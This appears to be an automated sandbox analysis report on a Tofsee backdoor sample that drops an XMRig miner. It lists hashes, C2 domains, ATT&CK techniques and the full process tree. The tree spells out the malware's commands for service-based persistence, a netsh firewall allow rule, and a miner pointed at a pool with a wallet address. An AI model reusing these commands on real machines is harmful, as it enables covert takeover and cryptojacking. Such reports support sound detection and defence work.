Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-04-2023 17:14

General

  • Target

    file.exe

  • Size

    213KB

  • MD5

    e468614fc58a4100991210b073621dd3

  • SHA1

    c75a31fb2d660bda920034a6c6caecdf1d1f690d

  • SHA256

    e75735f7291fe1d0d38a5f7f8f25eeebcb347619dd1df065ea2ea7cb077e35e8

  • SHA512

    e513e3da86bb5defd047026f1aa6d21c7676a2939eefbd1e3ea1c67cecc0ca486f3f47c67ce5768da33d0b480eec4f4b98b99c60b39213b3988efbdbb9fbe358

  • SSDEEP

    3072:2g8L7IZulOSCTwH+3AufD3wmLK2z4sOYwkYrW5B51zI7iMWkv:A0ulO6ArfLKwdZ07iMFv

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\wjlyjrpp\
      2⤵
        PID:524
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jqpckksw.exe" C:\Windows\SysWOW64\wjlyjrpp\
        2⤵
          PID:2144
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create wjlyjrpp binPath= "C:\Windows\SysWOW64\wjlyjrpp\jqpckksw.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4624
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description wjlyjrpp "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:4552
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start wjlyjrpp
          2⤵
          • Launches sc.exe
          PID:4512
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1240
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1040
          2⤵
          • Program crash
          PID:4956
      • C:\Windows\SysWOW64\wjlyjrpp\jqpckksw.exe
        C:\Windows\SysWOW64\wjlyjrpp\jqpckksw.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:328
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:5068
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2080
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 532
          2⤵
          • Program crash
          PID:4540
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2028 -ip 2028
        1⤵
          PID:2488
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 328 -ip 328
          1⤵
            PID:4432

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\jqpckksw.exe
            Filesize

            10.2MB

            MD5

            5b73dd5f8aa28dc8622e7aab2d3c3260

            SHA1

            689f567d107830d1d7ef3e6b037f0349906a2e96

            SHA256

            6c377bc12fb35ca7eed72e077dca56c4f77c5fa46715374e37c3e25410c796c9

            SHA512

            63d96472dff96b77a454aa85cf4f5b5c62abfc6665271922093ce51e45378ffcc3b7b5ab23d29282f5d858974096a94ba53292d8f4b5d420d1656aea0ca8c807

          • C:\Windows\SysWOW64\wjlyjrpp\jqpckksw.exe
            Filesize

            10.2MB

            MD5

            5b73dd5f8aa28dc8622e7aab2d3c3260

            SHA1

            689f567d107830d1d7ef3e6b037f0349906a2e96

            SHA256

            6c377bc12fb35ca7eed72e077dca56c4f77c5fa46715374e37c3e25410c796c9

            SHA512

            63d96472dff96b77a454aa85cf4f5b5c62abfc6665271922093ce51e45378ffcc3b7b5ab23d29282f5d858974096a94ba53292d8f4b5d420d1656aea0ca8c807

          • memory/328-145-0x0000000000400000-0x00000000004A2000-memory.dmp
            Filesize

            648KB

          • memory/2028-135-0x00000000021F0000-0x0000000002203000-memory.dmp
            Filesize

            76KB

          • memory/2028-139-0x0000000000400000-0x00000000004A2000-memory.dmp
            Filesize

            648KB

          • memory/2080-197-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-198-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-199-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-195-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-196-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-194-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-193-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/2080-188-0x0000000001240000-0x0000000001331000-memory.dmp
            Filesize

            964KB

          • memory/5068-167-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-174-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-160-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-161-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-164-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-163-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-162-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-166-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-165-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-156-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-168-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-169-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-170-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-171-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-173-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-159-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-172-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-175-0x00000000007F0000-0x0000000000800000-memory.dmp
            Filesize

            64KB

          • memory/5068-176-0x00000000019E0000-0x00000000019E5000-memory.dmp
            Filesize

            20KB

          • memory/5068-179-0x00000000019E0000-0x00000000019E5000-memory.dmp
            Filesize

            20KB

          • memory/5068-180-0x0000000007180000-0x000000000758B000-memory.dmp
            Filesize

            4.0MB

          • memory/5068-183-0x0000000007180000-0x000000000758B000-memory.dmp
            Filesize

            4.0MB

          • memory/5068-184-0x00000000019F0000-0x00000000019F7000-memory.dmp
            Filesize

            28KB

          • memory/5068-153-0x00000000007E0000-0x00000000007E6000-memory.dmp
            Filesize

            24KB

          • memory/5068-152-0x0000000002200000-0x000000000240F000-memory.dmp
            Filesize

            2.1MB

          • memory/5068-149-0x0000000002200000-0x000000000240F000-memory.dmp
            Filesize

            2.1MB

          • memory/5068-148-0x00000000003C0000-0x00000000003D5000-memory.dmp
            Filesize

            84KB

          • memory/5068-146-0x00000000003C0000-0x00000000003D5000-memory.dmp
            Filesize

            84KB

          • memory/5068-144-0x00000000003C0000-0x00000000003D5000-memory.dmp
            Filesize

            84KB

          • memory/5068-143-0x00000000003C0000-0x00000000003D5000-memory.dmp
            Filesize

            84KB

          • memory/5068-140-0x00000000003C0000-0x00000000003D5000-memory.dmp
            Filesize

            84KB